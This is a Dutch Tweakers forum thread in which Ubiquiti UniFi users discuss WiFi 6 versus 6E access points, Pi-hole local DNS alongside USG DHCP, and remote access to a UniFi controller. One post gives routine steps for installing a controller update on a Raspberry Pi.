- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti EdgeRouter Infinity
- Netwerkaccessoires
- Ubiquiti
- Amplifi High Density WiFi System (2 mesh points)
- Netwerkapparatuur
- Modems en routers
Zoals altijd... de welbekende vraag... :
Heb je wel de accesspoints zo afgestemd dat ze elkaar niet overlappen ?!
Of in ieder geval zo weinig mogelijk...
Apps = Ellende = NIET DOEN!!!
Heb je wel al die spyware van Ubiquiti uitgeschakeld in de UniFi Controller en via de losse files op het apparaat dat de Controller draait
Windows laat altijd de maximale theoretische snelheid zien als je WLAN NIC niks doet, maar op het moment dat je daadwerkelijk flink gaat zitten uploaden/downloaden dan kakt die snelheid al gauw in!
Doe gewoon wat iPerf3 testjes of simpelweg SMB file transfers en je merkt gauw genoeg wat je een beetje kan halen over je WiFi netwerk heen...
Meer Switch i.p.v. Hub werking inderdaad!
Ik hoop dan ook dat alle fabrikanten daar zich netjes aan houden deze keer, want bij 802.11ac was dat absoluut niet het geval!
Heel die 2.4 GHz band moeten we gewoon vergeten!
Lekker overal accesspoints plaatsen die op 5 GHz en straks geheel GRATISCH ook 6 GHz kunnen kletsen!
|| Stem op mooiere Topic Search linkjes! :) " || Pi-Hole : Geen advertenties meer voor je hele netwerk! >:) ||
Ja, is natuurlijk ergens ook wel logisch, want de PiHole is immers je DNS server.:
[...]
[...]
Mijn TIP zal voor altijd blijven :
- Static DHCP IP Mappings op basis van het MAC adres in de UniFi Controller.
- Local DNS Records in Pi-Hole voor elk van die IP adressen.
Kan tegenwoordig ook via de webGUI van Pi-Hole zelfs dus je hebt geen enkel excuus meer om het niet te doen!
Dan ga ik de lijst die ik nu aan het maken ben voor de USG gewoon in de /etc/dnsmasq.d van de PiHole zetten, dat zou compatibel moeten zijn.
Is het dan nog verstandig om de (local) DNS op de Unifi Controller uit te zetten (als dat überhaupt kan)?
Thanks!
/u/1401/haroid_icon_60x60.png?f=community){kind=icon}
Ehhm.... De U6 Pro heeft toch alleen 2.4 en 5Ghz radio's?:
[...]
Lekker overal accesspoints plaatsen die op 5 GHz en straks geheel GRATISCH ook 6 GHz kunnen kletsen!
Hoe moet zo'n apparaat 6GHz gaan bedienen zonder radio voor deze frequentie?
Wifi 6 ax gaat over 5GHz band.
Wifi 6E ax gaat over 6 GHz, maar daarvoor heb je wel een (aparte) radio nodig in je AP om deze frequentie band te kunnen gebruiken.
Edit: ik wil best al mijn bestaande AP's upgraden naar ax-protocol, maar alleen als ik zeker weet dat deze nieuwe AP's ook de 6Ghz ondersteunen.
Ik ga niet 2x upgraden. (eerst naar ax op 5GHz en later nog een keer naar ax op 6GHz)
[ Voor 36% gewijzigd door GarBaGe op 14-12-2021 10:18 ]
Ryzen9 5900X; 16GB DDR4-3200 ; RTX-4080S ; 7TB SSD
:strip_icc():strip_exif()/u/142317/crop5cbd9d51d7e14_cropped.jpeg?f=community)
ph34r my [WCG] Cows :P
- Netwerk switches
- Ubiquiti Unifi Dream Machine Special Edition
- Ubiquiti UniFi Dream Machine SE
- Ubiquiti UniFi
- Unifi
- Amplifi
- Accesspoints
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti UniFi AC In-Wall Pro
- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti EdgeRouter Infinity
- Netwerkaccessoires
- Ubiquiti
- Amplifi High Density WiFi System (2 mesh points)
- Netwerkapparatuur
- Modems en routers
Laat de custom.list aanmaken via de webGUI en vul die daarna lekker zelf in!
Dat doet je USG dus zolang die niet de DNS Server is heb je daar geen last van!
Maar ik lees net dat het al gelukt is :
:
@nero355 DNS in de PiHole zetten en DHCP via de USG werkt dikke prima!
....alleen wel zorgen dat de tweede PiHole ook de juiste dnsmasq file heeft
Als je nog wat wilt weten : Zie de link in mijn signature!
Ik heb onlangs begrepen dat de Intel AX200 serie WLAN NIC's de 6 GHz frequentie gewoon erbij hebben gekregen via een firmware/driver update dus misschien is er ook zoiets mogelijk voor sommige UniFi accesspoints
Dat is de theorie inderdaad
Dat ben ik dan ook helemaal met je eens!
|| Stem op mooiere Topic Search linkjes! :) " || Pi-Hole : Geen advertenties meer voor je hele netwerk! >:) ||
Ik ben eigenlijk nog wel benieuwd naar het volgende. Ik heb 16 sites aan mijn controller hangen. Hiervan hebben er 10 4g backup met een wisselend ip adres. Juist als de 4g backup is ingeschakeld wil ik de controller kunnen gebruiken om te zien of alles goed gaat. Hoe zou je dit inrichten qua beveiliging?:
[...]
Jij hebt unifi controllers direct aan het internet hangen en opvraagbaar voor iedereen?
Unifi Cloud access gebruiken of een DDNS dienst welke automatisch het IP adres aanpast bij de DNS naam
waarop je connect.
Cloud ☁️
Heb ik overwogen, maar vond het met de dnsmasq.d methode leuker (en dan zou ik het in theorie nog kunnen porteren, mocht dat ooit nodig zijn):
[...]
Laat de custom.list aanmaken via de webGUI en vul die daarna lekker zelf in!
Ja, volgens mij snap ik dat:
[...]
Dat doet je USG dus zolang die niet de DNS Server is heb je daar geen last van!
Maar ik lees net dat het al gelukt is :
[...]
Oh! Interessant! FF doorlezen!:
Als je nog wat wilt weten : Zie de link in mijn signature!
:strip_exif()/u/178284/crop5da5934de9043_cropped.gif?f=community)
Assumption is the mother of all fuck-ups / You're MAdD. Well thank God for that, 'cause if I wasn't this would probably never work
Sja, dan is het kiezen of delen; of je laat de deur open staan, of je meldt je aan voor early access en zet hem erop met twee klikken.
[ Voor 2% gewijzigd door Polyphemus op 15-12-2021 12:54 . Reden: Smiley vergeten ]
/u/604550/crop5616bb6cb8e0c_cropped.png?f=community)
:fill(white):strip_exif()/f/image/tK0t6VKbw24YRGWWjpSwoXiy.png?f=user_large)
:strip_icc():strip_exif()/u/343400/crop606d8eae90679_cropped.jpg?f=community)
Net gewoon kunnen installeren op mijn raspberry pi.
Als je een raspberry Pi gebruikt voor Unifi heb je hierbij uit ander topic hoe je dit kan installeren.
Topic: https://gathering.tweakers.net/forum/list_messages/1873125/0
Stap 1: inloggen op je pi.
Stap 2: wget https://dl.ui.com/unifi/6...0d/unifi_sysvinit_all.deb
Stap 3: sudo dpkg -i unifi_sysvinit_all.deb; sudo apt install -f -y
Stap 4: bij inloggen zie je dan jouw versie
:fill(white):strip_exif()/f/image/H51WBZlwb43t5SDpxQUsNYKB.png?f=user_large)
:strip_exif()/u/834/bianchi_logo2.gif?f=community){kind=logo}
Je kan er natuurlijk altijd een grotere ssd in drukken.
Heb zelf een Dell 3040micro met proxmox, draai hier ook unifi op. Voor de rest smokeping en plex.Is er btw een storing bij Ubnt? Externe toegang lijkt niet meer te werken.
[ Voor 4% gewijzigd door Harmen op 15-12-2021 16:41 ]
Whatever.